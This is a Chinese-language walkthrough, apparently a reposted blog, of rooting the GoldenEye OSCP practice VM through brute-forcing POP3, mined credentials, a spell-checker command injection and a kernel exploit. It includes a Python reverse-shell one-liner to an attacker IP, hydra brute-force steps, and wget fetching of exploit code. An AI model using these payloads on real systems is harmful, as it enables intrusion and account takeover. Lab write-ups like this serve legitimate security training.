当前位置: 代码迷 >> 综合 >> OSCP GoldenEye 靶机渗透
  详细解决方案

OSCP GoldenEye 靶机渗透

热度:65   发布时间:2023-10-22 01:59:27.0

GoldenEye 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-19

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

GoldenEye主机ip为172.16.1.14

OSCP GoldenEye 靶机渗透

nmap 端口扫描,发现开启的服务有smtp、http、pop3等等

nmap -p- -A 172.16.1.14

OSCP GoldenEye 靶机渗透

登录80端口查看信息,提示我们去/sev-home去登录

OSCP GoldenEye 靶机渗透

二、web渗透

登录页面

OSCP GoldenEye 靶机渗透

发现是个认证,这个地方走了好多弯路哈哈,burpsuit抓包authentication 然后base64解密发现用户名密码是按照(用户名:密码)加密后得到的,于是我直接用msf去爆破smtp查看用户然后尝试弱口令爆破登录,结果失败了,后来发现最初的登录页面源代码里面竟然有个js里面有注释,这个才是正确的线索。

OSCP GoldenEye 靶机渗透

OSCP GoldenEye 靶机渗透

这段注释包含了2个用户名(Boris、Natalya)1个密码,密码直接burpsuit里面smart decode解密

密码为InvincibleHack3r

用户名这个地方也有个坑,这两个用户名反复试了都不行,结果竟然是首字母小写?结果用户名为boris。

成功登陆后提示我们pop3服务在一个很高的端口,之前我们nmap已经扫到了pop3 在55007端口。。。。

OSCP GoldenEye 靶机渗透

我们直接尝试用xhydra九头蛇爆破pop3

首先设置target

OSCP GoldenEye 靶机渗透

设置用户名字典(直接把刚才那两个人名小写放到txt就可以了),密码字典(kali自带一个fastattack字典,目录为/usr/share/wordlists/fasttrack.txt)

OSCP GoldenEye 靶机渗透

设置线程,之前设置过的可以忽略,电脑好的小伙伴可以设置大一点1-50,越大跑的越快

OSCP GoldenEye 靶机渗透

然后直接start

第一个爆破成功

OSCP GoldenEye 靶机渗透

用户名boris 密码 secret1!

第二个爆破成功

OSCP GoldenEye 靶机渗透

用户名 natalya 密码 bird

尝试连接pop3

nc 172.16.1.14 55007

OSCP GoldenEye 靶机渗透

成功连接,不熟悉pop3命令的小伙伴可以看这里。

https://blog.csdn.net/qq_34935231/article/details/115009501

我们先来看boris的邮件

OSCP GoldenEye 靶机渗透

邮件1:

鲍里斯,我是管理员。你可以通过电子方式与这里的同事和学生交流。我不会扫描邮件的安全风险,因为我信任你和其他管理员。

OSCP GoldenEye 靶机渗透

邮件2:

鲍里斯,我能破解你的密码!

邮件3:

鲍里斯,

你和我们的财团合作会有很大的回报。附件是GoldenEye的最终访问代码。将它们放置在此服务器根目录中的隐藏文件中,然后从此电子邮件中删除。这些帐户代码只能有一组,我们需要为最终执行而保护它们。如果他们被取回并捕获了我们的计划将崩溃和燃烧!

一旦Xenia进入培训现场,熟悉GoldenEye终端代码,我们将推动进入最后阶段。。。。

PS-保持安全,否则我们会受到损害。

从邮件中我们可以得到的信息为一个叫xenia的人也是一个用户,接下来我们再看natalya的邮件。

邮件1:

OSCP GoldenEye 靶机渗透

娜塔莉娅,求你了,别再破坏鲍里斯的密码了。另外,你是GNO培训主管。一旦有学生被指定给你,我会给你发电子邮件。

另外,要小心可能的网络漏洞。我们有情报说戈德内耶正被一个叫杰纳斯的犯罪集团追捕。

邮件2:

OSCP GoldenEye 靶机渗透

好的,娜塔琳,我有一个新学生给你。由于这是一个新的系统,请让我或鲍里斯知道如果你看到任何配置问题,特别是它与安全有关…即使它不是,只是进入它的伪装下的“安全”…它会得到变更单升级没有太多麻烦:)

好的,用户信息是:

用户名:xenia 密码:RCP90rulez!

Boris确认她是一个有效的承包商所以就创建一个帐户好吗?

如果你没有外部域名的网址:severnaya-station/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程网络之外工作。。。。

既然您是Linux用户,只需将此服务器IP指向severnaya即可-网站在/etc/hosts中。

我们根据提示,修改本地hosts文件

新增域名172.16.1.14     severnaya-station.com 保存

OSCP GoldenEye 靶机渗透

浏览器访问severnaya-station/gnocertdir

OSCP GoldenEye 靶机渗透

发现有个login,我们登录xenia看看,在最近的会话中,一个叫Doak的用户,我们xhydra爆破密码尝试,用户名为doak

OSCP GoldenEye 靶机渗透

OSCP GoldenEye 靶机渗透

爆破后显示doak密码为goat,我们接着登录pop3查看有用信息

OSCP GoldenEye 靶机渗透

用户名为dr_doak 密码为4England! 登录web,结果发现了admin,同时在私人文件里面发现了s3cret.txt

OSCP GoldenEye 靶机渗透

OSCP GoldenEye 靶机渗透

点击下载txt,查看内容,一个图片链接,登录进去看看

OSCP GoldenEye 靶机渗透

OSCP GoldenEye 靶机渗透

我们下载这张图片

wget http://172.16.1.14/dir007key/for-007.jpg

使用exiftool查看图片信息,没有的小伙伴要先下载

apt-get install exiftool

exiftool for-007.jpg 

可以看到图片描述为base64加密的密文eFdpbnRlcjE5OTV4IQ==,解密后为xWinter1995x!

OSCP GoldenEye 靶机渗透

我们登录admin账户,试了msf,没有反弹出shell,发现admin账户发邮件时候需要点击检查器,只能手动设置反弹shell了

OSCP GoldenEye 靶机渗透

OSCP GoldenEye 靶机渗透

修改为python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'然后保存。

本地开启监听

nc -nvlp 4444

随便找一个可以写邮件的地方点击拼写检查器反弹shell

OSCP GoldenEye 靶机渗透

成功反弹了shell

三、提权

使用交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

查看系统及版本

lsb_release -a

uname -a

得到系统为Ubuntu 14.04 3.13 我们google下有没有提权exploit,发现有。

OSCP GoldenEye 靶机渗透

直接下载文件到本地,保存为gold.c,将文件移动到/var/www/html目录下(需要将exploit里面的gcc改为cc,因为受害机里面没有gcc)

然后开启apache服务

service apache2 start

再用受害机下载文件

wget http://172.16.1.4/gold.c

使用cc编译

cc -o gold gold.c

OSCP GoldenEye 靶机渗透

增加执行权限并运行,成功获得root权限

chmod +x gold

./gold

OSCP GoldenEye 靶机渗透

四、总结

此靶机难度还是不高的,主要是走了很多弯路,下次信息收集的时候还是要仔细一点,另外获得shell的地方卡了很久,当msf失败后一点头绪没有,看了网上大神们的指点才发现可以用检查器来反弹shell

pop3的命令不是很熟,网上搜集了资料进行学习。